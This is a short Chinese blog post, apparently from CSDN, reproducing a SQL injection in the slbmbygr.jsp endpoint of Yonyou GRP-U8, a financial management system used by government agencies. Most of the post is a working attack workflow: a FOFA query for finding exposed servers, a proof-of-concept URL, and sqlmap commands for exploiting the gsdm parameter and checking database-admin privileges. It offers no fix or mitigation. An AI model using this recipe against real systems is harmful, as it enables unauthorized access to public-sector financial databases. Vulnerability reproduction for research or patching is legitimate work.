-
【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞
一、漏洞描述
用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。
![在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png二、网络空间搜索引擎搜索
fofa查询语法
app="用友-GRP-U8"- 1
三、漏洞利用
POC:拼接/u8qx/slbmbygr.jsp?gsdm=1 访问
漏洞存在
漏洞不存在
使用SQLmap进行注入利用
sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*"- 1
查询当前用户权限sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*" --batch --is-dba- 1
-
相关阅读:
PDF如何解密?介绍几个简单小方法
线性代数贯串全书各章节的隐含关系(以秩为中心)
基于FPGA的SD卡的数据读写实现(SD NAND FLASH)
【位操作笔记】计算以2为底整数N的对数 查表法
【3D游戏建模全流程教学】在Maya中制作小岛模型
setup中ref与reactive
暑假第五周总结
MFC|选择获取文件路径
C 语言 while 和 do...while 循环
ARM cortex-M4核中断实验 中断和串口
- 原文地址:https://blog.csdn.net/weixin_53009585/article/details/133524337